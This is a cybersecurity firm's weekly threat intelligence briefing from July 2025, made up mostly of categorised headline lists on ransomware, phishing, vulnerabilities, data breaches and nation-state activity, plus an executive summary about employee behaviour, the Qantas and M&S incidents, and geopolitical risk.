Why hackers love Europe’s hospitals – POLITICO

Over 5.4 Million Affected in Healthcare Data Breach at Episource - Infosecurity Magazine

Anne Arundel Dermatology Data Breach Impacts 1.9 Million People - SecurityWeek

Organised Crime & Criminal Actors

"Telegram has become the new dark web” - 14.07.2025 | BURSA.RO

Abacus dark web drug market goes offline in suspected exit scam

How Criminal Networks Exploit Insider Vulnerabilities

SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million

Ryuk ransomware operator extradited to US, faces five years in federal prison | CyberScoop

Cyber crime Victim Suicide: Bengaluru Man Dies After Rs 11 Lakh Digital Scam

Cambodia Makes 1,000 Arrests in Latest Crackdown on Cyber Crime - SecurityWeek

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

North Korean hackers blamed for record spike in crypto thefts in 2025 | TechCrunch

Over Half of “Finfluencer” Victims Have Lost Money, Says TSB - Infosecurity Magazine

Ex-intelligence officer jailed for stealing bitcoin from Silk Road 2.0 operator - iTnews

Hacker returns cryptocurrency stolen from GMX exchange after $5 million bounty payment | The Record from Recorded Future News

Millions in savers’ cash goes missing after crypto company collapses

Hacker steals $27 million in BigONE exchange crypto breach

MITRE Launches New Framework to Tackle Crypto Risks - Infosecurity Magazine

Hackers Exploit Apache HTTP Server Flaw to Deploy Linuxsys Cryptocurrency Miner

Insider Risk and Insider Threats

Most cyber security risk comes from just 10% of employees - Help Net Security

One in 12 US/UK Employees Uses Chinese GenAI Tools - Infosecurity Magazine

How deepfake AI job applicants are stealing remote work

Fake North Korean IT workers: How companies can stop them • The Register

How North Korea infiltrates its IT experts into Western companies

Ex-intelligence officer jailed for stealing bitcoin from Silk Road 2.0 operator - iTnews

How Criminal Networks Exploit Insider Vulnerabilities

US Army soldier pleads guilty to extorting 10 tech, telecom firms

Ex-soldier Googled “can hacking be treason?” pleads guilty • The Register

Insurance

Cyber Insurance Premiums Drop, but Coverage Is Key

Supply Chain and Third Parties

Supplier risk is breaking the size myth in cyber | Insurance Business America

Cloud/SaaS

Hackers Leverage Microsoft Teams to Spread Matanbuchus 3.0 Malware to Targeted Firms

Why your Microsoft 365 setup might be more vulnerable than you think - Help Net Security

SaaS Security Adoption Grows Amid Rising Breach Rates - Infosecurity Magazine

Iran seeks three cloud providers to power its government • The Register

Outages

Cloudflare says 1.1.1.1 outage not caused by attack or BGP hijack

Encryption

Forget ransomware - most firms think quantum computing is the biggest security risk to come | TechRadar

How to Start Preparing for a Post-Quantum Future

How CISOs Can Prepare for the Quantum Cyber Security Threat

Safeguarding data in quantum era | Professional Security Magazine

What EU's PQC roadmap means on the ground - Help Net Security

Passwords, Credential Stuffing & Brute Force Attacks

'123456' password exposed chats for 64 million McDonald’s job applicants

From ‘P@ssw0rd’ to payday: Weak credentials threaten financial systems - Digital Journal

Ranked: The World's Most Common Passwords

98% of passwords can be cracked in seconds, analysis finds | Cybernews

Social Media

Elmo has been hacked, claims Trump is in Epstein files, calls for Jews to be exterminated • Graham Cluley

Quelle surprise! Twitter faces criminal probe in France • Graham Cluley

Training, Education and Awareness

Most cyber security risk comes from just 10% of employees - Help Net Security

Regulations, Fines and Legislation

Most European Financial Firms Still Lagging on DORA Compliance - Infosecurity Magazine

Cyber security of banks - News - Rádio RSI English - STVR

How financial IT becomes resilient: Implement DORA securely: By Krik Gunning

What EU's PQC roadmap means on the ground - Help Net Security

UK Online Safety Act 'not up to scratch' on misinformation • The Register

US aims to ban China technology in undersea telecoms cables | The Straits Times

Top US cyber agency CISA shrinks under Trump budget, staff cuts

Cyber security Regulation in Flux as Trump Administration Focuses on Evolving Foreign and Tech Threats | Latham & Watkins LLP - JDSupra

Defense Department to Spend $1B on ‘Offensive Cyber Operations’

Operational risks amid cyber policy uncertainty

Models, Frameworks and Standards

Most European Financial Firms Still Lagging on DORA Compliance - Infosecurity Magazine

How financial IT becomes resilient: Implement DORA securely: By Krik Gunning

MITRE Launches New Framework to Tackle Crypto Risks - Infosecurity Magazine

Data Protection

Buy Now, Pay Later... with your data - Help Net Security

Careers, Working in Cyber and Information Security

Military Veterans May Be What Cyber Security Is Looking For

Why burnout is one of the biggest threats to your security | TechRadar

What Fortune 100s are getting wrong about cyber security hiring - Help Net Security

Cyber Training: Post Challenge, Where Are the Skills Learned? | SC Media UK

Law Enforcement Action and Take Downs

US Army soldier pleads guilty to extorting 10 tech, telecom firms

Europol disrupts pro-Russian NoName057(16) DDoS hacktivist group

Newly Emerged GLOBAL GROUP RaaS Expands Operations with AI-Driven Negotiation Tools

13 Romanians Arrested for Phishing the UK’s Tax Service - SecurityWeek

French and UK Authorities Arrest Suspects in Ransomware Cases

Europol disrupts major network of Russian-speaking cyber criminals targeting Ukraine and its allies

Quelle surprise! Twitter faces criminal probe in France • Graham Cluley

SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million

Ryuk ransomware operator extradited to US, faces five years in federal prison | CyberScoop

Cambodia Makes 1,000 Arrests in Latest Crackdown on Cyber Crime - SecurityWeek

Indian Police Raid Tech Support Scam Call Center - Infosecurity Magazine

Four people bailed after arrests over cyber attacks on M&S, Harrods and Co-op - TheIndustry.fashion

FBI seized multiple piracy sites distributing pirated video games

Misinformation, Disinformation and Propaganda

UK Online Safety Act 'not up to scratch' on misinformation • The Register

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Russia shifts cyber war focus from US to UK following Trump's election | TechRadar

US aims to ban China technology in undersea telecoms cables | The Straits Times

Submarine Cable Security at Risk Amid Geopolitical Tensions & Limited Repair Capabilities

MPs Warn of “Significant” Iranian Cyber-Threat to UK - Infosecurity Magazine

Cyber attacks are evolving – so too must government response - New Statesman

What Is A Military Cyber Command And What Does It Do?

Defense Department to Spend $1B on ‘Offensive Cyber Operations’

Nation State Actors

Cyber attacks are evolving – so too must government response - New Statesman

Nearly one-third of Irish firms paid a cyber ransom in last year

China

One in 12 US/UK Employees Uses Chinese GenAI Tools - Infosecurity Magazine

China’s cyber sector amplifies Beijing’s hacking of US targets - The Washington Post

DeepSeek a threat to national security, warns Czech cyber agency | The Record from Recorded Future News

What It Takes to Stop the Next Salt Typhoon

US aims to ban China technology in undersea telecoms cables | The Straits Times

Submarine Cable Security at Risk Amid Geopolitical Tensions & Limited Repair Capabilities

Risk of undersea cable attacks backed by Russia and China likely to rise, report warns | Telecoms | The Guardian

Chinese Hackers Still Trying to Break Into Telecoms Across Globe

Altered Telegram App Steals Chinese Users' Android Data

US National Guard unit was 'extensively' hacked by Salt Typhoon in 2024, memo says | Reuters

Spain awarded €12.3 million in contracts to Huawei

Russia

Russia shifts cyber war focus from US to UK following Trump's election | TechRadar

Submarine Cable Security at Risk Amid Geopolitical Tensions & Limited Repair Capabilities

Risk of undersea cable attacks backed by Russia and China likely to rise, report warns | Telecoms | The Guardian

Europol disrupts pro-Russian NoName057(16) DDoS hacktivist group

Nato unit helping combat Putin's 'hybrid warfare' threat on British soil

Europol disrupts major network of Russian-speaking cyber criminals targeting Ukraine and its allies

Ukrainian hackers claim IT attack on Russian drone maker • The Register

Venture capital firm hit with $216 million penalty for ‘egregious’ violations of US sanctions against Russian billionaire - ICIJ

Iran

MPs Warn of “Significant” Iranian Cyber-Threat to UK - Infosecurity Magazine

Iranian-Backed Pay2Key Ransomware Resurfaces with 80% Profit Share for Cyber Criminals

Iran seeks three cloud providers to power its government • The Register

North Korea

How deepfake AI job applicants are stealing remote work

Fake North Korean IT workers: How companies can stop them • The Register

How North Korea infiltrates its IT experts into Western companies

North Korean hackers blamed for record spike in crypto thefts in 2025 | TechCrunch

North Korean XORIndex malware hidden in 67 malicious npm packages

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Hacktivism Increasingly Targeting Critical Infrastructure | Security Magazine

Tools and Controls

Most cyber security risk comes from just 10% of employees - Help Net Security

AI adoption is booming but secure scaling not so much - Help Net Security

DNS should be your next security priority: Lessons from NIST

SaaS Security Adoption Grows Amid Rising Breach Rates - Infosecurity Magazine

Cyber-Insurance Premiums Drop, but Coverage Is Key

Neglecting printer security is leaving you wide open to cyber attacks | IT Pro

Printer Security Gaps: A Broad, Leafy Avenue to Compromise

Hackers hide dangerous Mac trojan in legit apps | Cybernews

Hackers Exploit DNS Queries for C2 Operations and Data Exfiltration, Bypassing Traditional Defences

Hackers exploit a blind spot by hiding malware inside DNS records - Ars Technica

Police disrupt “Diskstation” ransomware gang attacking NAS devices

Compliance is evolving — Is your resilience ready? | TechRadar

ISC2 Finds Orgs Are Increasingly Leaning on AI

Making security and development co-owners of DevSecOps - Help Net Security

AI-Trained Malware Evades Microsoft Defender 8% of the Time, Researchers Warn – Tehrani.com – Tehrani on Tech

Security Flaws With Bitchat Highlight a ‘Systemic Issue’ With Vibe Coding

For developers and IT pros, AI can be both secret weapon and ticking time bomb | ZDNET

Curl creator mulls nixing bug bounty awards to stop AI slop • The Register

Cyber security executives love AI, cyber security analysts distrust it | TechRadar

Things to think about when deploying AI tools in the cyber security space

Hacker returns cryptocurrency stolen from GMX exchange after $5 million bounty payment | The Record from Recorded Future News

UK launches vulnerability research program for external experts

NCSC Launches Vulnerability Research Institute to Boost UK Resilience - Infosecurity Magazine

From Vibe Coding To Vibe Hacking — AI In A Hoodie

Other News

Hackers swap biometric data to bypass Windows login | Cybernews

Hacktivism Increasingly Targeting Critical Infrastructure | Security Magazine

Elmo has been hacked, claims Trump is in Epstein files, calls for Jews to be exterminated • Graham Cluley

Securing vehicles as they become platforms for code and data - Help Net Security

NCA says 'crude' comparison to FBI efficiency 'not credible' • The Register

6 ways to protect your passport and other travel docs from cyber criminals - before it's too late | ZDNET

Cyber Security Isn’t Just For Experts Anymore: Why You Should Care

Banks urged to beef up cyber security amid more incidents of financial phishing | ABS-CBN News

70% of healthcare cyber attacks result in delayed patient care, report finds – DataBreaches.Net

Understanding replay attacks: A hidden threat in cyber security

Why hackers love Europe’s hospitals – POLITICO

Train Brakes Can Be Hacked Over Radio—And the Industry Knew for 20 Years - SecurityWeek

Vulnerability Management

Brits clinging to Windows 10 face heightened risk, says NCSC | Computer Weekly

NCSC Urges Enterprises to Upgrade to Microsoft Windows 11 to Avoid Cyb - Infosecurity Magazine

Microsoft extends updates for old Exchange and Skype servers • The Register

Don't Want to Upgrade to Windows 11? Microsoft Offers Free Windows 10 Security Updates - CNET

Another WannaCry-size cyber event likely, report warns :: Insurance Day

NCSC Launches Vulnerability Research Institute to Boost UK Resilience - Infosecurity Magazine

Vulnerabilities

Qilin Emerged as The Most Active Group, Exploiting Unpatched Fortinet Vulnerabilities - Cyber Security News

Exploits for pre-auth Fortinet FortiWeb RCE flaw released, patch now

CitrixBleed 2 Flaw Poses Unacceptable Risk: CISA - SecurityWeek

Urgent: Google Releases Critical Chrome Update for CVE-2025-6558 Exploit Active in the Wild

Windows KB5064489 emergency update fixes Azure VM launch issues

SonicWall SMA devices persistently infected with stealthy OVERSTEP backdoor and rootkit - Help Net Security

Fully Patched SonicWall Gear Under Likely Zero-Day Attack

Critical SharePoint RCE Vulnerability Exploited Using Malicious XML Payload Within Web Part

Chrome fixes 6 security vulnerabilities. Get the update now! | Malwarebytes

Critical Wing FTP Server vulnerability exploited in the wild (CVE-2025-47812) - Help Net Security

Oracle Patches 200 Vulnerabilities With July 2025 CPU - SecurityWeek

Cisco Warns of Critical ISE Flaw Allowing Unauthenticated Attackers to Execute Root Code

VMware Flaws That Earned Hackers $340,000 at Pwn2Own Patched - SecurityWeek

Cisco Discloses '10' Flaw in ISE, ISE-PIC — Patch Now

July 2025 Breaks a Decade of Monthly Android Patches - SecurityWeek

Hackers Exploit Apache HTTP Server Flaw to Deploy Linuxsys Cryptocurrency Miner

Vulnerable firmware for Gigabyte motherboards could allow bootkit installation - Help Net Security

Over 600 Laravel Apps Exposed to Remote Code Execution Due to Leaked APP_KEYs on GitHub

Critical Langflow Vulnerability (CVE-2025-3248) Actively Exploited to Deliver Flodrix Botnet | Trend Micro (US)

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 13/07/2025 Black Arrow Admin 13/07/2025

Black Arrow Cyber Threat Intelligence Briefing 11 July 2025

Black Arrow Cyber Threat Intelligence Briefing 11 July 2025:

-‘The Worst Thing an Employee Could Do’: Workers Are Covering Up Cyber Attacks for Fear of Reprisal – Here’s Why That’s a Huge Problem

-Employees Are Quietly Bringing AI to Work and Leaving Security Behind

-Qantas Attack Reveals One Phone Call Can Crack Cyber Security’s Weakest Link: Humans

-Financial Firms Are Locking the Front Door but Leaving the Back Open

-Teens Arrested by NCA over Cyber Attacks on M&S, Harrods and Co-Op

-Should UK Companies Be Required to Disclose Major Cyber Attacks? M&S CEO Archie Norman Thinks So

-The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy

-Experts Warn This Top GenAI Tool Is Being Used to Build Phishing Websites

-The Rising Threat of Mobile Malware: How to Protect Your Device in 2025

-Nearly 8,500 Small and Medium Businesses Faced Cyber Attacks Through Fake Downloads and Mimic AI Tools in 2025

-Why Data Sovereignty Is Not Just a Legal Concern but a Cyber Security Imperative

-Whole of Society Must Respond to Threats Bringing ‘War to the Doorstep’, MPs Say

-Businesses at Greater Risk of Cyber Attack Due to Geopolitical Tensions

Executive Summary

We start this week’s review by looking at the employees in your organisation. A report reveals that two out of five UK office workers would not alert their employer to a suspected cyber attack, mainly in fear of being blamed, while a separate report shows that 90% of employees are entering data into unauthorised AI tools without approval. The consequences of insufficient security through employees and third parties are highlighted by the attack on a supplier of Quantas that resulted in the loss of personal data of up to 6 million customers, and observations of poor security in the majority of third party suppliers in the financial sector.

In a further update on the attacks on UK retailers including M&S, four suspects of up to 20 years of age have been arrested, while the Chairman of M&S has called for all organisations to be obliged to disclose when they have been attacked. We also report on the real need for organisations to be prepared for how they will respond to cyber security incidents.

We report on the risks of Generative AI, mobile malware, malicious applications imitating trusted names such as Zoom, and attacks on individuals. We also report on how geopolitical tensions are increasing the risks of cyber attacks on organisations, highlighting the need for an objective leadership-driven risk assessment and cyber security strategy.

We know that while many organisations look to their IT team or service provider to manage their cyber security, the attacker instead looks to the employee as one of the easiest ways to break into the systems. Cyber security can only work if it is embraced by an upskilled leadership team that takes command of its risk management and maintenance of controls across people, operations and technology including the organisation’s culture.

Governance, Risk and Compliance

‘The worst thing an employee could do’: Workers are covering up cyber attacks for fear of reprisal – here’s why that’s a huge problem | IT Pro

Many workers wouldn't tell their bosses if they'd been hit by a cyber attack | TechRadar

Businesses at greater risk of cyber attack due to geopolitical tensions - Verdict

The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy | Entrepreneur

Comms Business - MSPs relied on more than ever for cyber security, finds report

MSPs Under More Scrutiny From Customers on Cyber Than Ever - IT Security Guru

Pressure mounts on MSPs as enterprises flock to managed cyber security services | ChannelPro

Technology outpaces security adaptation, says Bitdefender

Get ahead of third-party risk or wave goodbye to your cyber resilience | TechRadar

Many companies are still failing to budget for cyber security | TechRadar

Cyber insurance confronts the age of intelligent threats | Insurance Business America

SMEs warned of 'serious consequences' if not prepared for cyber attacks | Insurance Times

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Attacks Spike Despite Gang Closure - IT Security Guru

‘No honour among thieves’: M&S hacking group starts turf war

Should UK companies be required to disclose major cyber attacks? | Cybernews

Ransomware Groups Multiply as Attack Surface Rapidly Expands, GuidePoint Security Finds

Hunters International Ransomware Is Not Shutting Down, It’s Rebranding - Infosecurity Magazine

Iranian ransomware crew promises big bucks for US attacks • The Register

Over 500 Scattered Spider Phishing Domains Poised to Target Multiple I - Infosecurity Magazine

Ransomware attacks carry huge financial impacts – but CISO worries still aren’t stopping firms from paying out | IT Pro

AiLock ransomware: What you need to know | Fortra

Unmasking the SafePay Ransomware Group - Infosecurity Magazine

SafePay Ransomware Surge Tend to Target Key Sectors

Short-lived ransomware group SatanLock to close down and leak data - BetaNews

New Bert Ransomware Group Strikes Globally with Multiple Variants - Infosecurity Magazine

French police arrest Russian pro basketball player on behalf of US over ransomware suspicions | CyberScoop

Ransomware negotiator allegedly struck deals with hackers to profit from extortion payments | TechSpot

Ransomware Victims

M&S shares sink lower after failing to recover from cyber attack

Cyber attack on M&S involved 'sophisticated impersonation', chairman says | Money News | Sky News

Should UK companies be required to disclose major cyber attacks? | Cybernews

Qantas data breach shows compliance doesn’t always mean protection and resilience | The Strategist

Qantas attack reveals one phone call is all it takes to crack cyber security’s weakest link: humans | Qantas | The Guardian

M&S boss says two big UK firms hit by unreported cyber-attacks | Retail industry | The Guardian

UK companies should have to disclose major cyber attacks, M&S says | Reuters

Four arrested in connection with M&S and Co-op cyber attacks - BBC News

Venture capital giant IdeaLab confirms breach, says private data was stolen in attack | TechRadar

Suspected Scattered Spider domains target multiple sectors • The Register

Over 500 Scattered Spider Phishing Domains Poised to Target Multiple I - Infosecurity Magazine

How M&S responds to its cyber-attack could have a serious impact on its future – and its customers

M&S chair refuses to discuss paying off cyber attackers | The Grocer

Hacker leaks Telefónica data allegedly stolen in a new breach

Qantas is being extorted in recent data-theft cyber attack

Ingram Micro Suffers Huge Ransomware Attack

IT Giant Ingram Micro Reveals Ransomware Breach - Infosecurity Magazine

Louis Vuitton says customer data was leaked following cyber attack | TechRadar

How cyber insurers are stepping up after M&S attack - Insurance Post

Qantas confirms data breach impacts 5.7 million customers

Ingram Micro Up and Running After Ransomware Attack

Customer, Employee Data Exposed in Nippon Steel Breach

Temporary measures introduced after Glasgow City Council hit by cyber attack | STV News

Phishing & Email Based Attacks

Experts warn this top GenAI tool is being used to build phishing websites | TechRadar

New Phishing Attack Impersonates as DWP Attacking Users to Steal Credit Card Data

Cyber crooks jump on .es domain for credential phishing trip • The Register

Phishing Scams Can Deceive Large Language Models | Security Magazine

Identity attacks surge 156% as phishermen get craftier • The Register

Experts flag a huge amount of cyber attacks coming from this unexpected domain | TechRadar

A Clever Russian Phishing Attack Using Fake State Department Employees

Human rights body hooked by phishing scam - Newsroom

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Colleague or cyber criminal? Blind employee trust costs businesses millions of dollars - Digital Journal

Other Social Engineering

M&S boss says two big UK firms hit by unreported cyber-attacks | Retail industry | The Guardian

M&S turned to FBI for help after ‘traumatic’ cyber attack

Browser Exploits Wane as Users Become the Attack Surface

DOJ Disrupts North Korean IT Worker Schemes Targeting U.S

Fraud, Scams and Financial Crime

Cyber crime and real-world crime are converging in a dangerous new way – here’s how to stay safe

Hundreds of Malicious Domains Registered Ahead of Prime Day - Infosecurity Magazine

BaitTrap: Over 17,000 Fake News Websites Caught Fueling Investment Fraud Globally

SIM Swap Fraud Is Surging — and That's a Good Thing

eSIM Hack Allows for Cloning, Spying - SecurityWeek

How to protect your cell phone number from SIM swap attacks | TechCrunch

New Phishing Attack Impersonates as DWP Attacking Users to Steal Credit Card Data

Hackers siphon $140M in Central Bank of Brazil attack, converting $40M to crypto | Cryptopolitan

Visa's 24/7 war room takes on global cyber criminals

Your old accounts are an online gold mine for cyber criminals — what you need do right now to stay safe | Tom's Guide

Human rights body hooked by phishing scam - Newsroom

PayPal's AI-powered scam alert system might intercept your transactions now - here's why | ZDNET

Artificial Intelligence

Experts warn this top GenAI tool is being used to build phishing websites | TechRadar

Employees are quietly bringing AI to work and leaving security behind - Help Net Security

Phishing Scams Can Deceive Large Language Models | Security Magazine

Nearly 8,500 small and medium businesses faced cyber attacks through mimic AI tools in 2025: Kaspersky - World - DAWN.COM

The Wild West of Agentic AI - An Attack Surface CISOs Can’t Afford to Ignore - SecurityWeek

Security practices must evolve to battle growing deepfake sophistication - SiliconANGLE

AI Security Institute targets cyber crime in hiring push - UKTN

The four-phase security approach to keep in mind for your AI transformation | TechRadar

It’s time to give AI security its own playbook and the people to run it - Help Net Security

Leveraging cyber security to establish trade secret protection in the age of AI - IAM

What Can Businesses Do About Ethical Dilemmas Posed by AI? - SecurityWeek

What Security Leaders Need to Know About AI Governance for SaaS

What CISOs Need to Know About AI Governance Frameworks | TechTarget

AI Accelerates Security Risks in Broken Data Environments

AI built it, but can you trust it? - Help Net Security

SEO Poisoning Campaign Targets 8,500+ SMB Users with Malware Disguised as AI Tools

Gemini can access your Android phone's other apps, unless you stop it - here's how | ZDNET

McDonald’s AI Hiring Bot With Password ‘123456’ Leaks Millions of Job-Seekers Data

Google Cloud keeps AI data in UK, but not the support • The Register

2FA/MFA

The MFA You Trust Is Lying to You – and Here's How Attackers Exploit It

Malware

SEO Poisoning Campaign Targets 8,500+ SMB Users with Malware Disguised as AI Tools

Weaponized Versions of PuTTY and WinSCP Attacking IT Admins Via Search Results

Malicious Open Source Packages Surge 188% Annually - Infosecurity Magazine

Atomic macOS infostealer adds backdoor for persistent attacks

Chrome Store Features Extension Poisoned With Sophisticated Spyware

Hackers abuse leaked Shellter red team tool to deploy infostealers

One of the biggest security threats to Apple systems just got a major upgrade - here's what we know | TechRadar

This dangerous banking trojan now uses scheduled maintenance to hide its malicious activities — don’t fall for this | Tom's Guide

Chrome, Edge users infected by 18 malicious extensions | Cybernews

Browser hijacking campaign infects 2.3M Chrome, Edge users • The Register

Russia-linked macOS malware adds dangerous backdoor| Cybernews

200+ browser extensions make a web-scraping botnet | PCWorld

Open source has a malware problem, and it's getting worse - Help Net Security

Bots/Botnets

200+ browser extensions make a web-scraping botnet | PCWorld

Hundreds of DVRs and routers are being hijacked to form another major botnet | TechRadar

Mobile

eSIM Hack Allows for Cloning, Spying - SecurityWeek

How to protect your cell phone number from SIM swap attacks | TechCrunch

The rising threat of mobile malware | Cybernews

Invisible UI flaw gives hackers full Android access | Cybernews

5 critical reasons why keeping your android security updates current is more important than ever

How to detect and fix a jailbroken iPhone | TechTarget

Gemini can access your Android phone's other apps, unless you stop it - here's how | ZDNET

Denial of Service/DoS/DDoS

The DDoS smoke screen: why restoring uptime may be your first mistake | TechRadar

Multiple Apache Tomcat Vulnerabilities Let Attackers Trigger DoS Attacks

Internet of Things – IoT

Hundreds of DVRs and routers are being hijacked to form another major botnet | TechRadar

Millions of Cars Exposed to Remote Hacking via PerfektBlue Attack - SecurityWeek

PerfektBlue Bluetooth attack allows hacking infotainment systems of Mercedes, Volkswagen, and Skoda

Chinese Video Surveillance Vendor Hikvision to Fight Canadian Ban - Infosecurity Magazine

Data Breaches/Leaks

Know Your Enemy: Understanding Dark Market Dynamics

McDonald’s AI Hiring Bot With Password ‘123456’ Leaks Millions of Job-Seekers Data

Hacker leaks Telefónica data allegedly stolen in a new breach

Temporary measures introduced after Glasgow City Council hit by cyber attack | STV News

Bitcoin Depot breach exposes data of nearly 27,000 crypto users

Cyber criminals stealing more data; Privacy watchdog concerned | NL Times

Louis Vuitton says customer data was leaked following cyber attack | TechRadar

Qantas confirms data breach impacts 5.7 million customers

Customer, Employee Data Exposed in Nippon Steel Breach

Nearly 300,000 people were impacted by cyber attack on Nova Scotia Power | The Record from Recorded Future News

South Korea Imposes Penalties on SK Telecom for Breach

How Worried Should Consumers Really Be After a Data Breach? - Infosecurity Magazine

Your data privacy is slipping away – here’s why, and what you can do about it

Organised Crime & Criminal Actors

Cyber crime and real-world crime are converging in a dangerous new way – here’s how to stay safe

‘No honour among thieves’: M&S hacking group starts turf war

Know Your Enemy: Understanding Dark Market Dynamics

Cyber criminals stealing more data; Privacy watchdog concerned | NL Times

Your old accounts are an online gold mine for cyber criminals — what you need do right now to stay safe | Tom's Guide

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

US Secret Service unmasks $400M crypto scam network

Hackers siphon $140M in Central Bank of Brazil attack, converting $40M to crypto | Cryptopolitan

Bitcoin Depot breach exposes data of nearly 27,000 crypto users

Insider Risk and Insider Threats

‘The worst thing an employee could do’: Workers are covering up cyber attacks for fear of reprisal – here’s why that’s a huge problem | IT Pro

DOJ Disrupts North Korean IT Worker Schemes Targeting U.S

Colleague or cyber criminal? Blind employee trust costs businesses millions of dollars - Digital Journal

IT Worker arrested for selling access in $100M PIX cyber heist

Ex-ASML engineer who stole chip tech for Russia gets 3 years • The Register

US airman admits leaking secrets on dating app • The Register

Two new pro-Russian hacktivist groups target Ukraine, recruit insiders | The Record from Recorded Future News

IT worker spared prison for anti-Islam cyber attack on WiFi at UK train stations | The Standard

Insurance

How cyber insurers are stepping up after M&S attack - Insurance Post

Cyber insurance confronts the age of intelligent threats | Insurance Business America

Supply Chain and Third Parties

Financial firms are locking the front door but leaving the back open - Help Net Security

Get ahead of third-party risk or wave goodbye to your cyber resilience | TechRadar

Global software supply chain visibility remains critically low - Help Net Security

MSPs Under More Scrutiny From Customers on Cyber Than Ever - IT Security Guru

Pressure mounts on MSPs as enterprises flock to managed cyber security services | ChannelPro

Cloud/SaaS

What Security Leaders Need to Know About AI Governance for SaaS

Google Cloud keeps AI data in UK, but not the support • The Register

Cloud security maintains its position as top spending priority - Help Net Security

Outages

Microsoft Outlook goes down around the world - here's what we know | ZDNET

Identity and Access Management

Identity attacks surge 156% as phishermen get craftier • The Register

Is the UK falling behind Europe on digital identity security? | Biometric Update

Encryption

EU Launches Plan to Implement Quantum-Secure Infrastructure - Infosecurity Magazine

Linux and Open Source

Malicious Open Source Packages Surge 188% Annually - Infosecurity Magazine

Open source has a malware problem, and it's getting worse - Help Net Security

New Linux Security Flaw Can Bypass Disk Encryption - OMG! Ubuntu

SUSE launches new European digital sovereignty support service to meet surging demand | ZDNET

Passwords, Credential Stuffing & Brute Force Attacks

McDonald’s AI Hiring Bot With Password ‘123456’ Leaks Millions of Job-Seekers Data

How passkeys work: Do your favorite sites even support passkeys? | ZDNET

How passkeys work: The complete guide to your inevitable passwordless future | ZDNET

Social Media

TikTok’s Handling of EU User Data in China Comes Under Scrutiny Again - Infosecurity Magazine

Tribunal Ruling Brings ICO’s £12.7m TikTok Fine Closer - Infosecurity Magazine

Regulations, Fines and Legislation

NIS2 Explained: An EU Directive For Secure Networked Systems - EE Times

NIS 2: Strengthening Europe’s Cyber Defences | Morrison & Foerster LLP - JDSupra

UK looking to revamp defence laws as undersea cable sabotage and cyber attacks create 'gray zone threats' | PC Gamer

What Trump's 'big beautiful bill' means for Wi-Fi 6E and Wi-Fi 7 users (Hint: It's not pretty) | ZDNET

Czech Republic in Finale of NIS 2 Transposition

EU Launches Plan to Implement Quantum-Secure Infrastructure - Infosecurity Magazine

South Korea Imposes Penalties on SK Telecom for Breach

What CISOs Need to Know About AI Governance Frameworks | TechTarget

CISOs urged to fix API risk before regulation forces their hand - Help Net Security

US Cyber Security at Risk Without Congressional Action

Trump seeks unprecedented $1.23 billion cut to federal cyber budget | CSO Online

The EU’s New Cyber Security Law for the Space Sector | Skadden, Arps, Slate, Meagher & Flom LLP - JDSupra

Models, Frameworks and Standards

NIS2 Explained: An EU Directive For Secure Networked Systems - EE Times

NIS 2: Strengthening Europe’s Cyber Defences | Morrison & Foerster LLP - JDSupra

Czech Republic in Finale of NIS 2 Transposition

Why law firms should get LOCS:23 certified - Legal Futures

Data Protection

TikTok’s Handling of EU User Data in China Comes Under Scrutiny Again - Infosecurity Magazine

Tribunal Ruling Brings ICO’s £12.7m TikTok Fine Closer - Infosecurity Magazine

Your data privacy is slipping away – here’s why, and what you can do about it

Careers, Working in Cyber and Information Security

Cyber security’s mental health reckoning - Tech Monitor

Why your security team feels stuck - Help Net Security

Will AI Gut the Cyber Security Talent Pipeline?

Hiring trends report | Professional Security Magazine

How to Get a Job in Cyber Security | The Global Recruiter

Law Enforcement Action and Take Downs

Four arrested in connection with M&S and Co-op cyber attacks - BBC News

Teens arrested by NCA over cyber attacks on M&S, Harrods and Co-op

US Secret Service unmasks $400M crypto scam network

Alleged Chinese hacker tied to Silk Typhoon arrested for cyberespionage

Suspected Hacker Linked to Silk Typhoon Arrested in Milan

Ex-ASML engineer who stole chip tech for Russia gets 3 years • The Register

US airman admits leaking secrets on dating app • The Register

French police arrest Russian pro basketball player on behalf of US over ransomware suspicions | CyberScoop

French cops cuff Russian hoopster for alleged ransomware • The Register

Is This Russian Basketball Player Part of a Ransomware Gang?

IT worker spared prison for anti-Islam cyber attack on WiFi at UK train stations | The Standard

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Alleged Chinese hacker tied to Silk Typhoon arrested for cyber espionage

UK looking to revamp defence laws as undersea cable sabotage and cyber attacks create 'gray zone threats' | PC Gamer

Businesses at greater risk of cyber attack due to geopolitical tensions - Verdict

UK and France unite against increasing cyber threats

Even children can help counter threats bringing ‘war to our doorstep’, MPs say | The Independent

Grey zone attacks are bringing conflict to Britain’s doorstep — it’s time we woke up to... - LBC

Whole of society must respond to threats bringing ‘war to the doorstep’, MPs say

Teach children how to catch Russian spies online, MPs told

Hostile activities bring war to the doorstep of each and every one of us, new report warns

Nation State Actors

China

Alleged Chinese hacker tied to Silk Typhoon arrested for cyberespionage

UK looking to revamp defence laws as undersea cable sabotage and cyber attacks create 'gray zone threats' | PC Gamer

